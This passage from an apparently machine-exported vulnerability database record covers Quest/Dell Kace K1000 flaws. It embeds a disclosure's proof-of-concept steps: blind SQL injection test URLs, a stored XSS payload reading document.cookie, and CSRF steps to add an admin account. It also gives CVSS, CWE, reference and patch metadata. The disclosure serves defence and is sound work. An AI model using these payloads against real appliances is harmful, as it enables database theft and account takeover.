KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc\nConnection: close\n\n2. Make a note of Content-Length in the response body. \n\n3. 
Send following request:\n\nhttp://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter\u0026parent_mapping=false\u0026place_holder=Unassigned\u0026suppress_place_holder_as_choice=false\u0026selected=13\u0026selvalue=13\u0027\u0026queue_id=1\u0026limit=10\u0026org_id=1\u0026locale=en_US\u0026id=13\n\n4. Response to above request shows that an error occurred and we are being redirected to /common/error.php\n\n5. Final payload to check if we get the original response back:\n\nhttp://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter\u0026parent_mapping=false\u0026place_holder=Unassigned\u0026suppress_place_holder_as_choice=false\u0026selected=13\u0026selvalue=13\u0027\u0027\u0026queue_id=1\u0026limit=10\u0026org_id=1\u0026locale=en_US\u0026id=13\n\n6. These tests confirm that the \u0027selvalue\u0027 parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database. \n\n\n\n=========================================================================================================================================================\n2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404)\n=========================================================================================================================================================\n\nThe Dell Kace allows Admin users to view OVAL templates via \u0027oval_detail.php\u0027, that can be accessed by a user with \u2018Read Only Administrator\u2019 rights. Also, the user input supplied to ID parameter is not sanitized that leads to a Blind SQL Injection vulnerability. \nAn authenticated user with \u2018Read Only Administrator\u2019 rights could exploit this vulnerability to retrieve sensitive information from the database. \n\n#Proof-Of-Concept:\n------------------\n1. 
Send following request to the target:\n\nGET /adminui/oval_detail.php?ID=6200 HTTP/1.1\nHost: 192.168.247.100\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.247.100/adminui/oval_list.php\nCookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n2. Response to above request shows some content with the content length of 32109 bytes:\n\n3. It shows information about OVAL-ID#24253:\n\n4. Now send following payload that tests this ID parameter for a true condition:\n\n\thttp://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432\n\n5. Response to above request again shows information about the same OVAL-ID#24252:\n\n6. 
Now, use following payload to test this ID parameter for a false condition:\n\t\n\thttp://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444\n\n7. The response to false condition is different than the response to normal and/or true condition. This response does not show any information about any OVAL-ID:\n\n8. These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database. \n\n=========================================================================================================================================================\n3. This script executes every time a user visits this page. \n\n#Proof-Of-Concept:\n------------------\n1. Log into the Dell Kace K1000 web interface as a least privileged user. \n2. Navigate to Service Desk--\u003eTickets and create a new ticket. \n3. Inject following payload in the Summary section:\n\t\n\tTest Ticket\u003c/textarea\u003e\u003c/div\u003e\u003c/div\u003e\u003cscript\u003ealert(\"XSSinSummary\");alert(document.cookie);\u003c/script\u003e\u003c!--\n\n4. Save the ticket. \n5. Go back to tickets and view this newly created ticket and a couple of alert boxes should pop up. \n6. \n\n\n=========================================================================================================================================================\n4. Misconfigured CORS Vulnerability (CVE-2018-5406)\n=========================================================================================================================================================\n\nThe Dell Kace K1000 fails to implement Cross Origin Resource Sharing (CORS) properly, that leads to a Cross Site Request Forgery (CSRF) attack. \n\nAn unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance\u2019s settings. 
Also, malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance\u2019s settings. \n\n\n#Proof-Of-Concept:\n------------------\n1. Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under Web Root of your Kali machine. \n2. Log into the web interface of the appliance as admin. \n3. Open a new tab in the same browser and access the HTML page from #1\n4. Save the ticket. \n5. Submit the request (This can be modified to submit the request automatically). \n6. Check BurpSuite to see if the request to add user \u2018Hacker\u2019 was sent to the appliance and if it was originated from your Kali machine\n7. Check the admin console to see if user Hacker has been added:\n\n===================================\n#Vulnerability Disclosure Timeline:\n===================================\n\n04/2018: Submitted report to CERT-US. \n04/2018: CERT-US reported the issue to vendor. \n05/2018: Awaiting vendor response. \n10/2018: Vendor asked to test the patch as they have fixed these issues already. \n10/2018: Confirmed that all the vulnerabilities except Vulnerability#2 is fixed in 9.0.270 and still exists in other patched version. \n01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019 and asked to publish this on June 01 2019 so that customers have enough time to patch. \n05/2019: Vendor published an advisory. \n06/2019: CERT-US published a Vulnerability Note, VU#877837",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "PACKETSTORM",
"id": "153150"
}
],
"trust": 2.97
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-5405",
"trust": 3.9
},
{
"db": "CERT/CC",
"id": "VU#877837",
"trust": 3.9
},
{
"db": "PACKETSTORM",
"id": "153150",
"trust": 2.5
},
{
"db": "JVN",
"id": "JVNVU91210160",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-21111",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042",
"trust": 0.6
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "PACKETSTORM",
"id": "153150"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"id": "VAR-201906-1119",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21111"
}
],
"trust": 1.2666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21111"
}
]
},
"last_update_date": "2023-12-18T12:28:09.282000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CERT Coordination Center report update (288310)",
"trust": 0.8,
"url": "https://support.quest.com/ja-jp/kb/288310/cert-coordination-center-report-update"
},
{
"title": "Patch for QuestSoftwareKaceK1000Appliance Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/166969"
},
{
"title": "Quest Software Kace K1000 Appliance Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=93134"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "https://www.kb.cert.org/vuls/id/877837/"
},
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/153150/dell-kace-system-management-appliance-sma-xss-sql-injection.html"
},
{
"trust": 2.5,
"url": "https://support.quest.com/kb/288310/cert-coordination-center-report-update"
},
{
"trust": 1.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5405"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5405"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5404"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5406"
},
{
"trust": 0.8,
"url": "https://support.quest.com/kace-systems-management-appliance/9.1/download-new-releaseshttps://support.quest.com/https://support.quest.com/kb/288310/cert-coordination-center-report-update"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu91210160/index.html"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/adminui/oval_detail.php?id=6200+and+6432=6444"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter\u0026parent_mapping=false\u0026place_holder=unassigned\u0026suppress_place_holder_as_choice=false\u0026selected=13\u0026selvalue=13\u0027\u0027\u0026queue_id=1\u0026limit=10\u0026org_id=1\u0026locale=en_us\u0026id=13"
},
{
"trust": 0.1,
"url": "https://www.kb.cert.org/vuls/id/877837/]"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter\u0026parent_mapping=false\u0026place_holder=unassigned\u0026suppress_place_holder_as_choice=false\u0026selected=13\u0026selvalue=13\u0027\u0026queue_id=1\u0026limit=10\u0026org_id=1\u0026locale=en_us\u0026id=13"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/adminui/oval_detail.php?id=6200+and+6432=6432"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/userui/ticket.php?queue_id=1"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/]"
},
{
"trust": 0.1,
"url": "http://192.168.247.100/adminui/oval_list.php"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5406"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "PACKETSTORM",
"id": "153150"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "PACKETSTORM",
"id": "153150"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-01T00:00:00",
"db": "CERT/CC",
"id": "VU#877837"
},
{
"date": "2019-07-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"date": "2019-06-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"date": "2019-06-03T20:53:31",
"db": "PACKETSTORM",
"id": "153150"
},
{
"date": "2019-06-03T19:29:01.657000",
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"date": "2019-06-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-03T00:00:00",
"db": "CERT/CC",
"id": "VU#877837"
},
{
"date": "2019-07-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"date": "2019-06-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"date": "2019-10-09T23:41:18.657000",
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "153150"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest Software Kace K1000 Appliance Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
],
"trust": 0.6
}
}
VAR-201906-1118
Vulnerability from variot - Updated: 2023-12-18 12:28 — The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated, remote attacker with least privileges ('User Console Only' role) to potentially exploit multiple Blind SQL Injection vulnerabilities to retrieve sensitive information from the database or copy the entire database. An authenticated remote attacker could leverage Blind SQL injections to obtain sensitive data. Because the lowest-privilege role is sufficient, any account that can log into the User Console is a viable attacker; upgrading to 9.0.270 or later removes the issue. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. Quest Software Kace K1000 Appliance is a system management device from Quest Software, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-1118",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace systems management appliance",
"scope": "lt",
"trust": 1.8,
"vendor": "quest",
"version": "9.0.270"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "quest kace",
"version": null
},
{
"model": "software kace k1000 appliance",
"scope": "lt",
"trust": 0.6,
"vendor": "quest",
"version": "9.0.270"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:quest:kace_systems_management_appliance_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.0.270",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:quest:kace_systems_management_appliance:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5404"
}
]
},
"cve": "CVE-2018-5404",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-5404",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-21112",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-5404",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-5404",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-21112",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-043",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated, remote attacker with least privileges (\u0027User Console Only\u0027 role) to potentially exploit multiple Blind SQL Injection vulnerabilities to retrieve sensitive information from the database or copy the entire database. An authenticated remote attacker could leverage Blind SQL injections to obtain sensitive data. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. Quest Software Kace K1000 Appliance is a system management device from Quest Software, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring.",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "CNVD",
"id": "CNVD-2019-21112"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-5404",
"trust": 3.8
},
{
"db": "CERT/CC",
"id": "VU#877837",
"trust": 3.8
},
{
"db": "JVN",
"id": "JVNVU91210160",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-21112",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043",
"trust": 0.6
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"id": "VAR-201906-1118",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21112"
}
],
"trust": 1.2666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21112"
}
]
},
"last_update_date": "2023-12-18T12:28:09.252000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.quest.com/"
},
{
"title": "QuestSoftwareKaceK1000ApplianceSQL injection vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/166971"
},
{
"title": "Quest Software Kace K1000 Appliance SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=93135"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21112"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-043"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015568"
},
{
"db": "NVD",
"id": "CVE-2018-5404"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
